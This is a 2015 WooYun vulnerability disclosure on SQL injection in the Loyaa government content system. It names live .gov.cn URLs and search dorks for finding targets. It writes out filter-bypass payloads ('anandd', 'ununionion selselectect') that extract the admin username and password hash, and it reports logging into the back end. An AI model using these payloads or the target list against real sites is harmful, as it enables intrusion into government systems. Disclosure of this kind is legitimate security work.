当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095995

漏洞标题:Loyaa 信息自动采编系统7处SQL注入绕过漏洞打包

相关厂商:宜达科技

漏洞作者: goubuli

提交时间:2015-02-11 18:28

修复时间:2015-05-14 14:36

公开时间:2015-05-14 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-13: 厂商已经确认,细节仅向厂商公开
2015-02-16: 细节向第三方安全合作伙伴开放
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

某通用政府采编系统7处SQL注入绕过漏洞打包,成功进后台

详细说明:

这个漏洞wooyun暂时还没有提交。。。见截图
漏洞一、注入点:
1、/more.php
如:http://www.jys.gov.cn/more.php?p=0&c=109016
参数c
2、videoMore.php
如:http://www.jys.gov.cn/videoMore.php?p=0&c=109003
参数c
3、/detail.php
所有参数
4、/detail_zt.php
所有参数
5、/video.php
所有参数
6、/index2.php
如:http://www.jys.gov.cn/video.php?c=109003&i=248251a
所有参数
7、hfrx.php
如:http://www.jys.gov.cn/hfrx.php?c=109006&i=245224a
所有参数
漏洞二、爆路径:
http://www.jiangyan.gov.cn/interface/jy_bbs_list.php?obj=ad_h2&c=5&n=3&t=46&tid=2

150206_16.png


搜索特征:
1、gov.cn/detail.php?c=
2、gov.cn/detail_zt.php?c=

150206_1.png


为了不损害目标站点及建站系统,标题写的比较隐晦,其实具体系统是《Loyaa 信息自动采编系统》 v3.0
如采购截图:

150206_2.png


按照通用流程标准,需要有演示+案例。
以两处较明显的特征搜索,其他的特征搜索不准确。
搜索特征:
第一处:

150206_14.png


第二处:

150206_15.png


案例:
http://www.jys.gov.cn/detail.php?c=101002&i=248464
http://huagang.gov.cn/detail.php?c=101203&i=205139
http://jsjygsj.gov.cn/detail.php?c=101004&i=246715
http://www.jsjyxzsp.gov.cn/detail.php?c=201811&i=49626
http://jykfq.gov.cn/detail.php?c=301631&i=210108
http://jysf.gov.cn/detail.php?c=222903&i=242453
http://www.jyjtj.gov.cn/detail.php?c=201701&i=231307
http://www.jsjyhrss.gov.cn/detail.php?c=101004&i=246591
http://www.jysagr.gov.cn/detail.php?c=101102&i=34411
http://www.jyhb.jiangyan.gov.cn/detail.php?c=211023&i=244371
http://jyws.gov.cn/detail.php?c=212001&i=220976
http://www.jydx.org.cn/detail.php?c=101101&i=49881
http://jslxz.cn/detail.php?c=201958&i=205507
http://www.jsjy.agri.gov.cn/detail.php?c=201904&i=222360

漏洞证明:

演示:
拿其中一个政府主站演示,演示一处,其他注入类似。。。注入点都一样。。。
具体链接:http://www.jys.gov.cn/detail_zt.php?i=195998&c=105130
直接提交',爆出SQL,如图

150206_3.png


但是在用工具跑的过程中发现有防御。。。跑不出来数据。。。如图

150206_4.png


下面演示纯手工注入搞定管理员账户。。。
1、提交and 1=1
直接过滤了and和=,如图

150206_5.png


2、提交带有()的数据
()也被过滤了。。。
3、order by
没有过滤order by

150206_6.png


搞到字段长度为:9
接下来union 查询
悲剧的是也被过滤了。。。这就不不截图了。。。
4、绕过
试了好多方法,如:URLEncode编码、tab、CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)、+拆解等等
原来系统所做的过滤是replace一些关键字
因此提交:

http://www.jys.gov.cn/detail_zt.php?i=195998&c=105130 anandd 1 is false ununionion selselectect 1,2,3,4,5,6,7,8,9


150206_7.png


因为过滤了(),而且也知道是MySQL数据库,因此接下来就是要搞管理员信息,然后进后台。。
由于在注入报错的时候能够看到具体的SQL,里面有一张表是:user_info
具体信息是:

Select 
news_title.id,
news_title.title,
news_title.categoryId,
news_title.editorId,
news_title.fromWeb,
news_title.dateCreated,
news_detail.detail,
news_category.title as category_title,
user_info.personalOffice
from
news_title,
news_detail,
news_category,
user_info
where
news_title.id=news_detail.titleId and
news_title.categoryId=news_category.customId and
news_title.editorId=user_info.id and
news_title.id=195998 and
news_title.archives=0 and
news_title.status>0
and news_title.categoryId=105130'

limit 1


后台登录地址:http://houtai.jiangyan.gov.cn/
在后台登录试了弱口令不能进去,查看页面源码找出用户名、密码字段:

150206_8.png


分别是:username、userpassword
下面查出用户名和密码

http://www.jys.gov.cn/detail_zt.php?i=195998&c=105130 anandd 1 is false ununionion selselectect 1,username,3,4,id,userpassword,7,8,9 frfromom user_info


150206_9.png


得到用户名:admin
密码:*7D4170B3DFD2B12261BC4D66C055EF5962E1C373
密文类型:mysql5。

150206_10.png


最终几毛钱解密成功。。。这里密码不公开了。。。

150206_11.png


登录成功

150206_12.png


用户信息

150206_13.png


申明:未做任何破坏操作。

修复方案:

1、过滤
2、增加WAF
3、添加友好错误页面

版权声明:转载请注明来源 goubuli@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-02-13 14:34

厂商回复:

CNVD确认所述情况,由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无